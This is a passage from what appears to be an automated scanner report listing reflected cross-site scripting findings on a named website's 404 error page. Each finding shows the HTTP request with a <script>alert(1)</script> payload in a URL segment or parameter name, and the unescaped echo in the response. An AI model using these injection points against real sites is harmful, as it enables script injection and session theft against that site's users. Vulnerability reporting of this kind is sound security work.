2.3018. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54aa2<script>alert(1)</script>fc05a396d7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4254aa2<script>alert(1)</script>fc05a396d7c/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4254aa2<script>alert(1)</script>fc05a396d7c/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3019. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f77b3<script>alert(1)</script>41fe4580ed8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesf77b3<script>alert(1)</script>41fe4580ed8/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesf77b3<script>alert(1)</script>41fe4580ed8/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3020. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f40d<script>alert(1)</script>0641944d885 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos7f40d<script>alert(1)</script>0641944d885/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos7f40d<script>alert(1)</script>0641944d885/ was not found on this server.</p>
...[SNIP]...

2.3021. http://www.resellerbase.com/detail/42/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7eef2<script>alert(1)</script>13ab1936556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/?7eef2<script>alert(1)</script>13ab1936556=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/?7eef2<script>alert(1)</script>13ab1936556=1 was not found on this server.</p>
...[SNIP]...

2.3022. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a43b<script>alert(1)</script>f17f84a56fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7a43b<script>alert(1)</script>f17f84a56fc/42/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7a43b<script>alert(1)</script>f17f84a56fc/42/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3023. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f293f<script>alert(1)</script>3922cbd8bd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42f293f<script>alert(1)</script>3922cbd8bd5/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42f293f<script>alert(1)</script>3922cbd8bd5/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3024. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bc092<script>alert(1)</script>fba3fdb90a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesbc092<script>alert(1)</script>fba3fdb90a2/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesbc092<script>alert(1)</script>fba3fdb90a2/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3025. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c1a09<script>alert(1)</script>1d868e9c1ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmosc1a09<script>alert(1)</script>1d868e9c1ea/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmosc1a09<script>alert(1)</script>1d868e9c1ea/images/ was not found on this server.</p>
...[SNIP]...

2.3026. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ec3a4<script>alert(1)</script>b562b7645c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/imagesec3a4<script>alert(1)</script>b562b7645c8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/imagesec3a4<script>alert(1)</script>b562b7645c8/ was not found on this server.</p>
...[SNIP]...

2.3027. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59fa4<script>alert(1)</script>a27001badd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/?59fa4<script>alert(1)</script>a27001badd9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/?59fa4<script>alert(1)</script>a27001badd9=1 was not found on this server.</p>
...[SNIP]...

2.3028. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 279a2<script>alert(1)</script>b5bce08ba72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail279a2<script>alert(1)</script>b5bce08ba72/42/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail279a2<script>alert(1)</script>b5bce08ba72/42/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3029. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66da0<script>alert(1)</script>4741c031f22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4266da0<script>alert(1)</script>4741c031f22/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4266da0<script>alert(1)</script>4741c031f22/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3030. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4f23a<script>alert(1)</script>83a3f9a25b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes4f23a<script>alert(1)</script>83a3f9a25b8/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes4f23a<script>alert(1)</script>83a3f9a25b8/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3031. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6263<script>alert(1)</script>97b2e7368e7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmose6263<script>alert(1)</script>97b2e7368e7/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmose6263<script>alert(1)</script>97b2e7368e7/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3032. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f394c<script>alert(1)</script>fa2ac328690 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/imagesf394c<script>alert(1)</script>fa2ac328690/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/imagesf394c<script>alert(1)</script>fa2ac328690/rating/ was not found on this server.</p>
...[SNIP]...

2.3033. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 34e23<script>alert(1)</script>973c28e51be was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating34e23<script>alert(1)</script>973c28e51be/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating34e23<script>alert(1)</script>973c28e51be/ was not found on this server.</p>
...[SNIP]...

2.3034. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32d05<script>alert(1)</script>9819c213dac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/?32d05<script>alert(1)</script>9819c213dac=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/?32d05<script>alert(1)</script>9819c213dac=1 was not found on this server.</p>
...[SNIP]...

2.3035. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5124<script>alert(1)</script>675b74dc32f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile5124<script>alert(1)</script>675b74dc32f/42/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile5124<script>alert(1)</script>675b74dc32f/42/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3036. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b525<script>alert(1)</script>c538b772b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/423b525<script>alert(1)</script>c538b772b0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/423b525<script>alert(1)</script>c538b772b0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3037. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87359<script>alert(1)</script>7328addab8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes87359<script>alert(1)</script>7328addab8d/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
